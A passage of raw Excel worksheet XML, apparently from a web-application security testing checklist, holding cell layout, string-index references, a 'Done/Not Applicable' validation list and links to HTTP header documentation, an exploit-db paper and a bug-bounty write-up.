      <c r="H101" s="9" t="s">
        <v>100</v>
      </c>
      <c r="I101" s="9" t="s">
        <v>288</v>
      </c>
      <c r="J101" s="9"/>
    </row>
    <row r="102" spans="2:10" ht="93.75" customHeight="1">
      <c r="B102" s="7"/>
      <c r="C102" s="8" t="s">
        <v>289</v>
      </c>
      <c r="D102" s="8"/>
      <c r="E102" s="9"/>
      <c r="F102" s="9" t="s">
        <v>290</v>
      </c>
      <c r="G102" s="11" t="s">
        <v>291</v>
      </c>
      <c r="H102" s="9" t="s">
        <v>100</v>
      </c>
      <c r="I102" s="9" t="s">
        <v>292</v>
      </c>
      <c r="J102" s="9"/>
    </row>
    <row r="103" spans="2:10" ht="266.25" customHeight="1">
      <c r="B103" s="7"/>
      <c r="C103" s="8" t="s">
        <v>293</v>
      </c>
      <c r="D103" s="8"/>
      <c r="E103" s="9"/>
      <c r="F103" s="9" t="s">
        <v>294</v>
      </c>
      <c r="G103" s="9" t="s">
        <v>295</v>
      </c>
      <c r="H103" s="9"/>
      <c r="I103" s="9" t="s">
        <v>296</v>
      </c>
      <c r="J103" s="9"/>
    </row>
    <row r="104" spans="2:10" ht="129.75" customHeight="1">
      <c r="B104" s="7"/>
      <c r="C104" s="8" t="s">
        <v>297</v>
      </c>
      <c r="D104" s="8"/>
      <c r="E104" s="9"/>
      <c r="F104" s="9" t="s">
        <v>298</v>
      </c>
      <c r="G104" s="48" t="s">
        <v>299</v>
      </c>
      <c r="H104" s="9"/>
      <c r="I104" s="9" t="s">
        <v>300</v>
      </c>
      <c r="J104" s="9"/>
    </row>
    <row r="105" spans="2:10" ht="41.4">
      <c r="B105" s="7" t="s">
        <v>301</v>
      </c>
      <c r="C105" s="8"/>
      <c r="D105" s="8"/>
      <c r="E105" s="9"/>
      <c r="F105" s="9"/>
      <c r="G105" s="9"/>
      <c r="H105" s="9"/>
      <c r="I105" s="9"/>
      <c r="J105" s="9"/>
    </row>
    <row r="106" spans="2:10" ht="79.2">
      <c r="B106" s="7"/>
      <c r="C106" s="8" t="s">
        <v>302</v>
      </c>
      <c r="D106" s="8"/>
      <c r="E106" s="9"/>
      <c r="F106" s="9" t="s">
        <v>303</v>
      </c>
      <c r="G106" s="11" t="s">
        <v>304</v>
      </c>
      <c r="H106" s="9"/>
      <c r="I106" s="9"/>
      <c r="J106" s="9"/>
    </row>
    <row r="107" spans="2:10" ht="79.2">
      <c r="B107" s="7"/>
      <c r="C107" s="8" t="s">
        <v>305</v>
      </c>
      <c r="D107" s="8"/>
      <c r="E107" s="9"/>
      <c r="F107" s="9" t="s">
        <v>306</v>
      </c>
      <c r="G107" s="9" t="s">
        <v>307</v>
      </c>
      <c r="H107" s="9"/>
      <c r="I107" s="9"/>
      <c r="J107" s="9"/>
    </row>
    <row r="108" spans="2:10" ht="118.5" customHeight="1">
      <c r="B108" s="7"/>
      <c r="C108" s="8" t="s">
        <v>308</v>
      </c>
      <c r="D108" s="8"/>
      <c r="E108" s="9"/>
      <c r="F108" s="9" t="s">
        <v>309</v>
      </c>
      <c r="G108" s="11" t="s">
        <v>310</v>
      </c>
      <c r="H108" s="9"/>
      <c r="I108" s="9"/>
      <c r="J108" s="9"/>
    </row>
    <row r="109" spans="2:10" ht="50.25" customHeight="1">
      <c r="B109" s="7"/>
      <c r="C109" s="8" t="s">
        <v>311</v>
      </c>
      <c r="D109" s="8"/>
      <c r="E109" s="9"/>
      <c r="F109" s="9" t="s">
        <v>312</v>
      </c>
      <c r="G109" s="9" t="s">
        <v>313</v>
      </c>
      <c r="H109" s="9"/>
      <c r="I109" s="9"/>
      <c r="J109" s="9"/>
    </row>
    <row r="110" spans="2:10" ht="39.6">
      <c r="B110" s="7"/>
      <c r="C110" s="8" t="s">
        <v>314</v>
      </c>
      <c r="D110" s="8"/>
      <c r="E110" s="9"/>
      <c r="F110" s="9" t="s">
        <v>315</v>
      </c>
      <c r="G110" s="11" t="s">
        <v>316</v>
      </c>
      <c r="H110" s="9"/>
      <c r="I110" s="9"/>
      <c r="J110" s="9"/>
    </row>
    <row r="111" spans="2:10" ht="27.6">
      <c r="B111" s="7"/>
      <c r="C111" s="8" t="s">
        <v>317</v>
      </c>
      <c r="D111" s="8"/>
      <c r="F111" s="9" t="s">
        <v>318</v>
      </c>
      <c r="G111" s="9"/>
      <c r="H111" s="9"/>
      <c r="I111" s="9"/>
      <c r="J111" s="16" t="s">
        <v>319</v>
      </c>
    </row>
    <row r="112" spans="2:10" ht="369.6">
      <c r="B112" s="7"/>
      <c r="C112" s="1" t="s">
        <v>320</v>
      </c>
      <c r="D112" s="8"/>
      <c r="E112" s="9"/>
      <c r="F112" s="9" t="s">
        <v>321</v>
      </c>
      <c r="G112" s="49" t="s">
        <v>322</v>
      </c>
      <c r="H112" s="9"/>
      <c r="J112" s="22" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="113" spans="2:10" ht="48" customHeight="1">
      <c r="B113" s="7"/>
      <c r="C113" s="8" t="s">
        <v>324</v>
      </c>
      <c r="D113" s="8"/>
      <c r="E113" s="9"/>
      <c r="F113" s="9" t="s">
        <v>325</v>
      </c>
      <c r="G113" s="9" t="s">
        <v>326</v>
      </c>
      <c r="H113" s="9"/>
      <c r="I113" s="9"/>
      <c r="J113" s="9"/>
    </row>
    <row r="114" spans="2:10" s="69" customFormat="1" ht="409.6">
      <c r="B114" s="70"/>
      <c r="C114" s="72" t="s">
        <v>327</v>
      </c>
      <c r="D114" s="72"/>
      <c r="E114" s="71"/>
      <c r="F114" s="71" t="s">
        <v>328</v>
      </c>
      <c r="G114" s="69" t="s">
        <v>329</v>
      </c>
      <c r="H114" s="71" t="s">
        <v>330</v>
      </c>
      <c r="I114" s="71"/>
      <c r="J114" s="71" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="115" spans="2:10" ht="158.4">
      <c r="B115" s="7"/>
      <c r="C115" s="8" t="s">
        <v>332</v>
      </c>
      <c r="D115" s="8"/>
      <c r="E115" s="9"/>
      <c r="F115" s="9" t="s">
        <v>333</v>
      </c>
      <c r="G115" s="9" t="s">
        <v>521</v>
      </c>
      <c r="H115" s="9"/>
      <c r="I115" s="9"/>
      <c r="J115" s="9"/>
    </row>
    <row r="116" spans="2:10">
      <c r="B116" s="7"/>
      <c r="C116" s="8"/>
      <c r="D116" s="8"/>
      <c r="E116" s="9"/>
      <c r="F116" s="9"/>
      <c r="G116" s="9"/>
      <c r="H116" s="9"/>
      <c r="I116" s="9"/>
      <c r="J116" s="9"/>
    </row>
    <row r="117" spans="2:10">
      <c r="B117" s="7"/>
      <c r="C117" s="8"/>
      <c r="D117" s="8"/>
      <c r="E117" s="9"/>
      <c r="F117" s="9"/>
      <c r="G117" s="9"/>
      <c r="H117" s="9"/>
      <c r="I117" s="9"/>
      <c r="J117" s="9"/>
    </row>
    <row r="118" spans="2:10">
      <c r="B118" s="7"/>
      <c r="C118" s="8"/>
      <c r="D118" s="8"/>
      <c r="E118" s="9"/>
      <c r="F118" s="9"/>
      <c r="G118" s="9"/>
      <c r="H118" s="9"/>
      <c r="I118" s="9"/>
      <c r="J118" s="9"/>
    </row>
    <row r="119" spans="2:10">
      <c r="B119" s="7"/>
      <c r="C119" s="8"/>
      <c r="D119" s="8"/>
      <c r="E119" s="9"/>
      <c r="F119" s="9"/>
      <c r="G119" s="9"/>
      <c r="H119" s="9"/>
      <c r="I119" s="9"/>
      <c r="J119" s="9"/>
    </row>
    <row r="120" spans="2:10">
      <c r="B120" s="7"/>
      <c r="C120" s="8"/>
      <c r="D120" s="8"/>
      <c r="E120" s="9"/>
      <c r="F120" s="9"/>
      <c r="G120" s="9"/>
      <c r="H120" s="9"/>
      <c r="I120" s="9"/>
      <c r="J120" s="9"/>
    </row>
    <row r="121" spans="2:10">
      <c r="B121" s="7"/>
      <c r="C121" s="8"/>
      <c r="D121" s="8"/>
      <c r="E121" s="9"/>
      <c r="F121" s="9"/>
      <c r="G121" s="9"/>
      <c r="H121" s="9"/>
      <c r="I121" s="9"/>
      <c r="J121" s="9"/>
    </row>
    <row r="122" spans="2:10">
      <c r="B122" s="7"/>
      <c r="C122" s="8"/>
      <c r="D122" s="8"/>
      <c r="E122" s="9"/>
      <c r="F122" s="9"/>
      <c r="G122" s="9"/>
      <c r="H122" s="9"/>
      <c r="I122" s="9"/>
      <c r="J122" s="9"/>
    </row>
    <row r="123" spans="2:10" s="2" customFormat="1">
      <c r="B123" s="5"/>
      <c r="C123" s="6"/>
      <c r="D123" s="6"/>
    </row>
    <row r="124" spans="2:10" s="2" customFormat="1">
      <c r="B124" s="5"/>
      <c r="C124" s="6"/>
      <c r="D124" s="6"/>
    </row>
    <row r="125" spans="2:10" s="2" customFormat="1">
      <c r="B125" s="5"/>
      <c r="C125" s="6"/>
      <c r="D125" s="6"/>
    </row>
    <row r="126" spans="2:10" s="2" customFormat="1">
      <c r="B126" s="5"/>
      <c r="C126" s="6"/>
      <c r="D126" s="6"/>
    </row>
    <row r="127" spans="2:10" s="2" customFormat="1">
      <c r="B127" s="5"/>
      <c r="C127" s="6"/>
      <c r="D127" s="6"/>
    </row>
    <row r="128" spans="2:10" s="2" customFormat="1">
      <c r="B128" s="5"/>
      <c r="C128" s="6"/>
      <c r="D128" s="6"/>
    </row>
    <row r="129" spans="2:4" s="2" customFormat="1">
      <c r="B129" s="5"/>
      <c r="C129" s="6"/>
      <c r="D129" s="6"/>
    </row>
    <row r="130" spans="2:4" s="2" customFormat="1">
      <c r="B130" s="5"/>
      <c r="C130" s="6"/>
      <c r="D130" s="6"/>
    </row>
    <row r="131" spans="2:4" s="2" customFormat="1">
      <c r="B131" s="5"/>
      <c r="C131" s="6"/>
      <c r="D131" s="6"/>
    </row>
    <row r="132" spans="2:4" s="2" customFormat="1">
      <c r="B132" s="5"/>
      <c r="C132" s="6"/>
      <c r="D132" s="6"/>
    </row>
    <row r="133" spans="2:4" s="2" customFormat="1">
      <c r="B133" s="5"/>
      <c r="C133" s="6"/>
      <c r="D133" s="6"/>
    </row>
    <row r="134" spans="2:4" s="2" customFormat="1">
      <c r="B134" s="5"/>
      <c r="C134" s="6"/>
      <c r="D134" s="6"/>
    </row>
    <row r="135" spans="2:4" s="2" customFormat="1">
      <c r="B135" s="5"/>
      <c r="C135" s="6"/>
      <c r="D135" s="6"/>
    </row>
    <row r="136" spans="2:4" s="2" customFormat="1">
      <c r="B136" s="5"/>
      <c r="C136" s="6"/>
      <c r="D136" s="6"/>
    </row>
    <row r="137" spans="2:4" s="2" customFormat="1">
      <c r="B137" s="5"/>
      <c r="C137" s="6"/>
      <c r="D137" s="6"/>
    </row>
    <row r="138" spans="2:4" s="2" customFormat="1">
      <c r="B138" s="5"/>
      <c r="C138" s="6"/>
      <c r="D138" s="6"/>
    </row>
    <row r="139" spans="2:4" s="2" customFormat="1">
      <c r="B139" s="5"/>
      <c r="C139" s="6"/>
      <c r="D139" s="6"/>
    </row>
    <row r="140" spans="2:4" s="2" customFormat="1">
      <c r="B140" s="5"/>
      <c r="C140" s="6"/>
      <c r="D140" s="6"/>
    </row>
    <row r="141" spans="2:4" s="2" customFormat="1">
      <c r="B141" s="5"/>
      <c r="C141" s="6"/>
      <c r="D141" s="6"/>
    </row>
    <row r="142" spans="2:4" s="2" customFormat="1">
      <c r="B142" s="5"/>
      <c r="C142" s="6"/>
      <c r="D142" s="6"/>
    </row>
    <row r="143" spans="2:4" s="2" customFormat="1">
      <c r="B143" s="5"/>
      <c r="C143" s="6"/>
      <c r="D143" s="6"/>
    </row>
    <row r="144" spans="2:4" s="2" customFormat="1">
      <c r="B144" s="5"/>
      <c r="C144" s="6"/>
      <c r="D144" s="6"/>
    </row>
    <row r="145" spans="2:4" s="2" customFormat="1">
      <c r="B145" s="5"/>
      <c r="C145" s="6"/>
      <c r="D145" s="6"/>
    </row>
    <row r="146" spans="2:4" s="2" customFormat="1">
      <c r="B146" s="5"/>
      <c r="C146" s="6"/>
      <c r="D146" s="6"/>
    </row>
    <row r="147" spans="2:4" s="2" customFormat="1">
      <c r="B147" s="5"/>
      <c r="C147" s="6"/>
      <c r="D147" s="6"/>
    </row>
    <row r="148" spans="2:4" s="2" customFormat="1">
      <c r="B148" s="5"/>
      <c r="C148" s="6"/>
      <c r="D148" s="6"/>
    </row>
    <row r="149" spans="2:4" s="2" customFormat="1">
      <c r="B149" s="5"/>
      <c r="C149" s="6"/>
      <c r="D149" s="6"/>
    </row>
    <row r="150" spans="2:4" s="2" customFormat="1">
      <c r="B150" s="5"/>
      <c r="C150" s="6"/>
      <c r="D150" s="6"/>
    </row>
    <row r="151" spans="2:4" s="2" customFormat="1">
      <c r="B151" s="5"/>
      <c r="C151" s="6"/>
      <c r="D151" s="6"/>
    </row>
    <row r="152" spans="2:4" s="2" customFormat="1">
      <c r="B152" s="5"/>
      <c r="C152" s="6"/>
      <c r="D152" s="6"/>
    </row>
    <row r="153" spans="2:4" s="2" customFormat="1">
      <c r="B153" s="5"/>
      <c r="C153" s="6"/>
      <c r="D153" s="6"/>
    </row>
    <row r="154" spans="2:4" s="2" customFormat="1">
      <c r="B154" s="5"/>
      <c r="C154" s="6"/>
      <c r="D154" s="6"/>
    </row>
    <row r="155" spans="2:4" s="2" customFormat="1">
      <c r="B155" s="5"/>
      <c r="C155" s="6"/>
      <c r="D155" s="6"/>
    </row>
    <row r="156" spans="2:4" s="2" customFormat="1">
      <c r="B156" s="5"/>
      <c r="C156" s="6"/>
      <c r="D156" s="6"/>
    </row>
    <row r="157" spans="2:4" s="2" customFormat="1">
      <c r="B157" s="5"/>
      <c r="C157" s="6"/>
      <c r="D157" s="6"/>
    </row>
    <row r="158" spans="2:4" s="2" customFormat="1">
      <c r="B158" s="5"/>
      <c r="C158" s="6"/>
      <c r="D158" s="6"/>
    </row>
    <row r="159" spans="2:4" s="2" customFormat="1">
      <c r="B159" s="5"/>
      <c r="C159" s="6"/>
      <c r="D159" s="6"/>
    </row>
    <row r="160" spans="2:4" s="2" customFormat="1">
      <c r="B160" s="5"/>
      <c r="C160" s="6"/>
      <c r="D160" s="6"/>
    </row>
    <row r="161" spans="2:4" s="2" customFormat="1">
      <c r="B161" s="5"/>
      <c r="C161" s="6"/>
      <c r="D161" s="6"/>
    </row>
    <row r="162" spans="2:4" s="2" customFormat="1">
      <c r="B162" s="5"/>
      <c r="C162" s="6"/>
      <c r="D162" s="6"/>
    </row>
    <row r="163" spans="2:4" s="2" customFormat="1">
      <c r="B163" s="5"/>
      <c r="C163" s="6"/>
      <c r="D163" s="6"/>
    </row>
    <row r="164" spans="2:4" s="2" customFormat="1">
      <c r="B164" s="5"/>
      <c r="C164" s="6"/>
      <c r="D164" s="6"/>
    </row>
    <row r="165" spans="2:4" s="2" customFormat="1">
      <c r="B165" s="5"/>
      <c r="C165" s="6"/>
      <c r="D165" s="6"/>
    </row>
    <row r="166" spans="2:4" s="2" customFormat="1">
      <c r="B166" s="5"/>
      <c r="C166" s="6"/>
      <c r="D166" s="6"/>
    </row>
    <row r="167" spans="2:4" s="2" customFormat="1">
      <c r="B167" s="5"/>
      <c r="C167" s="6"/>
      <c r="D167" s="6"/>
    </row>
    <row r="168" spans="2:4" s="2" customFormat="1">
      <c r="B168" s="5"/>
      <c r="C168" s="6"/>
      <c r="D168" s="6"/>
    </row>
    <row r="169" spans="2:4" s="2" customFormat="1">
      <c r="B169" s="5"/>
      <c r="C169" s="6"/>
      <c r="D169" s="6"/>
    </row>
    <row r="170" spans="2:4" s="2" customFormat="1">
      <c r="B170" s="5"/>
      <c r="C170" s="6"/>
      <c r="D170" s="6"/>
    </row>
    <row r="171" spans="2:4" s="2" customFormat="1">
      <c r="B171" s="5"/>
      <c r="C171" s="6"/>
      <c r="D171" s="6"/>
    </row>
    <row r="172" spans="2:4" s="2" customFormat="1">
      <c r="B172" s="5"/>
      <c r="C172" s="6"/>
      <c r="D172" s="6"/>
    </row>
    <row r="173" spans="2:4" s="2" customFormat="1">
      <c r="B173" s="5"/>
      <c r="C173" s="6"/>
      <c r="D173" s="6"/>
    </row>
    <row r="174" spans="2:4" s="2" customFormat="1">
      <c r="B174" s="5"/>
      <c r="C174" s="6"/>
      <c r="D174" s="6"/>
    </row>
    <row r="175" spans="2:4" s="2" customFormat="1">
      <c r="B175" s="5"/>
      <c r="C175" s="6"/>
      <c r="D175" s="6"/>
    </row>
    <row r="176" spans="2:4" s="2" customFormat="1">
      <c r="B176" s="5"/>
      <c r="C176" s="6"/>
      <c r="D176" s="6"/>
    </row>
    <row r="177" spans="2:4" s="2" customFormat="1">
      <c r="B177" s="5"/>
      <c r="C177" s="6"/>
      <c r="D177" s="6"/>
    </row>
    <row r="178" spans="2:4" s="2" customFormat="1">
      <c r="B178" s="5"/>
      <c r="C178" s="6"/>
      <c r="D178" s="6"/>
    </row>
    <row r="179" spans="2:4" s="2" customFormat="1">
      <c r="B179" s="5"/>
      <c r="C179" s="6"/>
      <c r="D179" s="6"/>
    </row>
    <row r="180" spans="2:4" s="2" customFormat="1">
      <c r="B180" s="5"/>
      <c r="C180" s="6"/>
      <c r="D180" s="6"/>
    </row>
    <row r="181" spans="2:4" s="2" customFormat="1">
      <c r="B181" s="5"/>
      <c r="C181" s="6"/>
      <c r="D181" s="6"/>
    </row>
    <row r="182" spans="2:4" s="2" customFormat="1">
      <c r="B182" s="5"/>
      <c r="C182" s="6"/>
      <c r="D182" s="6"/>
    </row>
    <row r="183" spans="2:4" s="2" customFormat="1">
      <c r="B183" s="5"/>
      <c r="C183" s="6"/>
      <c r="D183" s="6"/>
    </row>
    <row r="184" spans="2:4" s="2" customFormat="1">
      <c r="B184" s="5"/>
      <c r="C184" s="6"/>
      <c r="D184" s="6"/>
    </row>
    <row r="185" spans="2:4" s="2" customFormat="1">
      <c r="B185" s="5"/>
      <c r="C185" s="6"/>
      <c r="D185" s="6"/>
    </row>
    <row r="186" spans="2:4" s="2" customFormat="1">
      <c r="B186" s="5"/>
      <c r="C186" s="6"/>
      <c r="D186" s="6"/>
    </row>
    <row r="187" spans="2:4" s="2" customFormat="1">
      <c r="B187" s="5"/>
      <c r="C187" s="6"/>
      <c r="D187" s="6"/>
    </row>
    <row r="188" spans="2:4" s="2" customFormat="1">
      <c r="B188" s="5"/>
      <c r="C188" s="6"/>
      <c r="D188" s="6"/>
    </row>
    <row r="189" spans="2:4" s="2" customFormat="1">
      <c r="B189" s="5"/>
      <c r="C189" s="6"/>
      <c r="D189" s="6"/>
    </row>
    <row r="190" spans="2:4" s="2" customFormat="1">
      <c r="B190" s="5"/>
      <c r="C190" s="6"/>
      <c r="D190" s="6"/>
    </row>
    <row r="191" spans="2:4" s="2" customFormat="1">
      <c r="B191" s="5"/>
      <c r="C191" s="6"/>
      <c r="D191" s="6"/>
    </row>
    <row r="192" spans="2:4" s="2" customFormat="1">
      <c r="B192" s="5"/>
      <c r="C192" s="6"/>
      <c r="D192" s="6"/>
    </row>
    <row r="193" spans="2:4" s="2" customFormat="1">
      <c r="B193" s="5"/>
      <c r="C193" s="6"/>
      <c r="D193" s="6"/>
    </row>
    <row r="194" spans="2:4" s="2" customFormat="1">
      <c r="B194" s="5"/>
      <c r="C194" s="6"/>
      <c r="D194" s="6"/>
    </row>
    <row r="195" spans="2:4" s="2" customFormat="1">
      <c r="B195" s="5"/>
      <c r="C195" s="6"/>
      <c r="D195" s="6"/>
    </row>
    <row r="196" spans="2:4" s="2" customFormat="1">
      <c r="B196" s="5"/>
      <c r="C196" s="6"/>
      <c r="D196" s="6"/>
    </row>
    <row r="197" spans="2:4" s="2" customFormat="1">
      <c r="B197" s="5"/>
      <c r="C197" s="6"/>
      <c r="D197" s="6"/>
    </row>
    <row r="198" spans="2:4" s="2" customFormat="1">
      <c r="B198" s="5"/>
      <c r="C198" s="6"/>
      <c r="D198" s="6"/>
    </row>
    <row r="199" spans="2:4" s="2" customFormat="1">
      <c r="B199" s="5"/>
      <c r="C199" s="6"/>
      <c r="D199" s="6"/>
    </row>
    <row r="200" spans="2:4" s="2" customFormat="1">
      <c r="B200" s="5"/>
      <c r="C200" s="6"/>
      <c r="D200" s="6"/>
    </row>
    <row r="201" spans="2:4" s="2" customFormat="1">
      <c r="B201" s="5"/>
      <c r="C201" s="6"/>
      <c r="D201" s="6"/>
    </row>
    <row r="202" spans="2:4" s="2" customFormat="1">
      <c r="B202" s="5"/>
      <c r="C202" s="6"/>
      <c r="D202" s="6"/>
    </row>
    <row r="203" spans="2:4" s="2" customFormat="1">
      <c r="B203" s="5"/>
      <c r="C203" s="6"/>
      <c r="D203" s="6"/>
    </row>
    <row r="204" spans="2:4" s="2" customFormat="1">
      <c r="B204" s="5"/>
      <c r="C204" s="6"/>
      <c r="D204" s="6"/>
    </row>
    <row r="205" spans="2:4" s="2" customFormat="1">
      <c r="B205" s="5"/>
      <c r="C205" s="6"/>
      <c r="D205" s="6"/>
    </row>
    <row r="206" spans="2:4" s="2" customFormat="1">
      <c r="B206" s="5"/>
      <c r="C206" s="6"/>
      <c r="D206" s="6"/>
    </row>
    <row r="207" spans="2:4" s="2" customFormat="1">
      <c r="B207" s="5"/>
      <c r="C207" s="6"/>
      <c r="D207" s="6"/>
    </row>
    <row r="208" spans="2:4" s="2" customFormat="1">
      <c r="B208" s="5"/>
      <c r="C208" s="6"/>
      <c r="D208" s="6"/>
    </row>
    <row r="209" spans="2:4" s="2" customFormat="1">
      <c r="B209" s="5"/>
      <c r="C209" s="6"/>
      <c r="D209" s="6"/>
    </row>
    <row r="210" spans="2:4" s="2" customFormat="1">
      <c r="B210" s="5"/>
      <c r="C210" s="6"/>
      <c r="D210" s="6"/>
    </row>
    <row r="211" spans="2:4" s="2" customFormat="1">
      <c r="B211" s="5"/>
      <c r="C211" s="6"/>
      <c r="D211" s="6"/>
    </row>
    <row r="212" spans="2:4" s="2" customFormat="1">
      <c r="B212" s="5"/>
      <c r="C212" s="6"/>
      <c r="D212" s="6"/>
    </row>
    <row r="213" spans="2:4" s="2" customFormat="1">
      <c r="B213" s="5"/>
      <c r="C213" s="6"/>
      <c r="D213" s="6"/>
    </row>
    <row r="214" spans="2:4" s="2" customFormat="1">
      <c r="B214" s="5"/>
      <c r="C214" s="6"/>
      <c r="D214" s="6"/>
    </row>
    <row r="215" spans="2:4" s="2" customFormat="1">
      <c r="B215" s="5"/>
      <c r="C215" s="6"/>
      <c r="D215" s="6"/>
    </row>
    <row r="216" spans="2:4" s="2" customFormat="1">
      <c r="B216" s="5"/>
      <c r="C216" s="6"/>
      <c r="D216" s="6"/>
    </row>
    <row r="217" spans="2:4" s="2" customFormat="1">
      <c r="B217" s="5"/>
      <c r="C217" s="6"/>
      <c r="D217" s="6"/>
    </row>
    <row r="218" spans="2:4" s="2" customFormat="1">
      <c r="B218" s="5"/>
      <c r="C218" s="6"/>
      <c r="D218" s="6"/>
    </row>
    <row r="219" spans="2:4" s="2" customFormat="1">
      <c r="B219" s="5"/>
      <c r="C219" s="6"/>
      <c r="D219" s="6"/>
    </row>
    <row r="220" spans="2:4" s="2" customFormat="1">
      <c r="B220" s="5"/>
      <c r="C220" s="6"/>
      <c r="D220" s="6"/>
    </row>
    <row r="221" spans="2:4" s="2" customFormat="1">
      <c r="B221" s="5"/>
      <c r="C221" s="6"/>
      <c r="D221" s="6"/>
    </row>
    <row r="222" spans="2:4" s="2" customFormat="1">
      <c r="B222" s="5"/>
      <c r="C222" s="6"/>
      <c r="D222" s="6"/>
    </row>
    <row r="223" spans="2:4" s="2" customFormat="1">
      <c r="B223" s="5"/>
      <c r="C223" s="6"/>
      <c r="D223" s="6"/>
    </row>
    <row r="224" spans="2:4" s="2" customFormat="1">
      <c r="B224" s="5"/>
      <c r="C224" s="6"/>
      <c r="D224" s="6"/>
    </row>
    <row r="225" spans="2:4" s="2" customFormat="1">
      <c r="B225" s="5"/>
      <c r="C225" s="6"/>
      <c r="D225" s="6"/>
    </row>
    <row r="226" spans="2:4" s="2" customFormat="1">
      <c r="B226" s="5"/>
      <c r="C226" s="6"/>
      <c r="D226" s="6"/>
    </row>
    <row r="227" spans="2:4" s="2" customFormat="1">
      <c r="B227" s="5"/>
      <c r="C227" s="6"/>
      <c r="D227" s="6"/>
    </row>
    <row r="228" spans="2:4" s="2" customFormat="1">
      <c r="B228" s="5"/>
      <c r="C228" s="6"/>
      <c r="D228" s="6"/>
    </row>
    <row r="229" spans="2:4" s="2" customFormat="1">
      <c r="B229" s="5"/>
      <c r="C229" s="6"/>
      <c r="D229" s="6"/>
    </row>
    <row r="230" spans="2:4" s="2" customFormat="1">
      <c r="B230" s="5"/>
      <c r="C230" s="6"/>
      <c r="D230" s="6"/>
    </row>
    <row r="231" spans="2:4" s="2" customFormat="1">
      <c r="B231" s="5"/>
      <c r="C231" s="6"/>
      <c r="D231" s="6"/>
    </row>
    <row r="232" spans="2:4" s="2" customFormat="1">
      <c r="B232" s="5"/>
      <c r="C232" s="6"/>
      <c r="D232" s="6"/>
    </row>
    <row r="233" spans="2:4" s="2" customFormat="1">
      <c r="B233" s="5"/>
      <c r="C233" s="6"/>
      <c r="D233" s="6"/>
    </row>
    <row r="234" spans="2:4" s="2" customFormat="1">
      <c r="B234" s="5"/>
      <c r="C234" s="6"/>
      <c r="D234" s="6"/>
    </row>
    <row r="235" spans="2:4" s="2" customFormat="1">
      <c r="B235" s="5"/>
      <c r="C235" s="6"/>
      <c r="D235" s="6"/>
    </row>
    <row r="236" spans="2:4" s="2" customFormat="1">
      <c r="B236" s="5"/>
      <c r="C236" s="6"/>
      <c r="D236" s="6"/>
    </row>
    <row r="237" spans="2:4" s="2" customFormat="1">
      <c r="B237" s="5"/>
      <c r="C237" s="6"/>
      <c r="D237" s="6"/>
    </row>
    <row r="238" spans="2:4" s="2" customFormat="1">
      <c r="B238" s="5"/>
      <c r="C238" s="6"/>
      <c r="D238" s="6"/>
    </row>
    <row r="239" spans="2:4" s="2" customFormat="1">
      <c r="B239" s="5"/>
      <c r="C239" s="6"/>
      <c r="D239" s="6"/>
    </row>
    <row r="240" spans="2:4" s="2" customFormat="1">
      <c r="B240" s="5"/>
      <c r="C240" s="6"/>
      <c r="D240" s="6"/>
    </row>
    <row r="241" spans="2:4" s="2" customFormat="1">
      <c r="B241" s="5"/>
      <c r="C241" s="6"/>
      <c r="D241" s="6"/>
    </row>
    <row r="242" spans="2:4" s="2" customFormat="1">
      <c r="B242" s="5"/>
      <c r="C242" s="6"/>
      <c r="D242" s="6"/>
    </row>
    <row r="243" spans="2:4" s="2" customFormat="1">
      <c r="B243" s="5"/>
      <c r="C243" s="6"/>
      <c r="D243" s="6"/>
    </row>
    <row r="244" spans="2:4" s="2" customFormat="1">
      <c r="B244" s="5"/>
      <c r="C244" s="6"/>
      <c r="D244" s="6"/>
    </row>
    <row r="245" spans="2:4" s="2" customFormat="1">
      <c r="B245" s="5"/>
      <c r="C245" s="6"/>
      <c r="D245" s="6"/>
    </row>
    <row r="246" spans="2:4" s="2" customFormat="1">
      <c r="B246" s="5"/>
      <c r="C246" s="6"/>
      <c r="D246" s="6"/>
    </row>
    <row r="247" spans="2:4" s="2" customFormat="1">
      <c r="B247" s="5"/>
      <c r="C247" s="6"/>
      <c r="D247" s="6"/>
    </row>
    <row r="248" spans="2:4" s="2" customFormat="1">
      <c r="B248" s="5"/>
      <c r="C248" s="6"/>
      <c r="D248" s="6"/>
    </row>
    <row r="249" spans="2:4" s="2" customFormat="1">
      <c r="B249" s="5"/>
      <c r="C249" s="6"/>
      <c r="D249" s="6"/>
    </row>
    <row r="250" spans="2:4" s="2" customFormat="1">
      <c r="B250" s="5"/>
      <c r="C250" s="6"/>
      <c r="D250" s="6"/>
    </row>
  </sheetData>
  <sheetProtection selectLockedCells="1" selectUnlockedCells="1"/>
  <mergeCells count="1">
    <mergeCell ref="C1:F1"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="list" operator="equal" allowBlank="1" sqref="G82:G86 G89 D87:D88 D90:D122 D4:D81" xr:uid="{00000000-0002-0000-0000-000000000000}">
      <formula1>"Done,Not Applicable,"</formula1>
      <formula2>0</formula2>
    </dataValidation>
  </dataValidations>
  <hyperlinks>
    <hyperlink ref="G19" r:id="rId1" xr:uid="{00000000-0004-0000-0000-000000000000}"/>
    <hyperlink ref="J21" r:id="rId2" display="https://en.wikipedia.org/wiki/List_of_HTTP_header_fields_x000a_https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html_x000a_https://www.w3.org/Protocols/rfc2616/rfc2616-sec6.html_x000a_http://www.comptechdoc.org/independent/web/http/reference/_x000a_https://www.cs.tut.fi/~jkorp" xr:uid="{00000000-0004-0000-0000-000001000000}"/>
    <hyperlink ref="J38" r:id="rId3" xr:uid="{00000000-0004-0000-0000-000003000000}"/>
    <hyperlink ref="J111" r:id="rId4" xr:uid="{00000000-0004-0000-0000-000006000000}"/>
    <hyperlink ref="J93" r:id="rId5" xr:uid="{00000000-0004-0000-0000-000007000000}"/>
    <hyperlink ref="J88" r:id="rId6" xr:uid="{561EC1F1-4A22-F849-8BC4-27810A82736E}"/>
    <hyperlink ref="H97" r:id="rId7" xr:uid="{00000000-0004-0000-0000-000002000000}"/>
    <hyperlink ref="J84" r:id="rId8" display="https://www.exploit-db.com/docs/40287.pdf" xr:uid="{00000000-0004-0000-0000-000005000000}"/>
    <hyperlink ref="J53" r:id="rId9" location="heading-the-target-web-application-has-some-features-including-but-not-limited-to" display="https://blog.usamav.dev/two-account-takeover-bugs-worth-4300-dollar-bounty - heading-the-target-web-application-has-some-features-including-but-not-limited-to" xr:uid="{78F8F9BC-A310-0147-820F-73A84B03B0F5}"/>
  </hyperlinks>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51180555555555551" footer="0.51180555555555551"/>
